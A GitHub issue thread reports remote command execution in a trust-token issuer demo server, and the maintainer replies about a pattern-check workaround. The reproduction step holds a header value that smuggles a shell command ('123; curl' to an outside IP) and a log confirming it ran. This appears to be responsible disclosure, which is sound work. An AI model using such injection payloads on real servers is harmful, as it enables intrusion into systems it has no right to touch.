### ISSUE TITLE
Security Report - Remote Command Execution

### ISSUE THREAD

**Issue by AhnMo** [JackJey/trust-token-issuer-demo#8]
### Overview
I tried to test trust token api, however I found remote command execution point and confirmed.
The server could be abused by this, so you need to fix by using `execFile` instead of `exec`.

### Vulnable code
https://github.com/JackJey/trust-token-issuer-demo/blob/544e0b2f5d2e77be573acb7d525294d2507cb230/server.js#L51

### Reproduce step
- Reqeust as below:
```http
POST /.well-known/trust-token/issuance HTTP/2
Host: trust-token-issuer-demo.glitch.me
Sec-Trust-Token: 123; curl http://141.164.45.239

```
- `curl http://141.164.45.239` is executed and I found the access log as belew:
```
54.174.102.90 - - [29/Sep/2021:07:38:04 +0000] "GET / HTTP/1.1" 200 3106 "-" "curl/7.47.0"
```

**Comment by JackJey** [comment]
Thanks @AhnMo and sorry for late reply.
I'm working on create binding from node.js to c but not yet, so it's workaround for rapid demo release.
I added pattern check before calling exec and believe this will cover some attack.
but of course I'll add biding to c and will fix potential problem.

FYI: This repo was merged into https://github.com/JackJey/trust-token-demo/ and commit is below.
https://github.com/JackJey/trust-token-demo/commit/ff2867ff4a89a992f62b44018bd14b6a88e4c731
